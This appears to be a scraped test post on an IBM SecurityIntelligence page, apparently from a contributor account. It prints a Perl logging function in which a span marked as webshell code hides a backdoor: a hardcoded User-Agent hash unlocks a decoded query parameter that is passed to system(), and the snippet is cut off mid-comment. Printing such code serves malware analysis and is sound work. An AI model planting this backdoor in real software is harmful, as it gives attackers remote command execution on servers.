neandro.avelino

neandro.avelino is a contributor for SecurityIntelligence.
Topics June 5, 2024

a code post test

< 1 min read - code test sub Msg {  my ($event, $level, $data) = @_;  my ($pkg, $file, $line) = caller; — start of webshell code —  my $ua = $ENV{HTTP_USER_AGENT};  my $req = $ENV{QUERY_STRING};  my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;  my @param = split(/&/, $req);  if (index($ua, $qur) != -1) {    if ($param[1]){      my @res = split(/=/, $param[1]);      if ($res[0] eq “cdi”){        $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;        $res[1] =~ tr/!-~/P-~!-O/;        system(${res[1]});      }    }  } — end of webshell code —  $file = substr ($file, rindex ($file, “/”)+1);  # Prevent C printf format codes to make…

Failed to load data

Topic updates

 Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today
© 2024 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature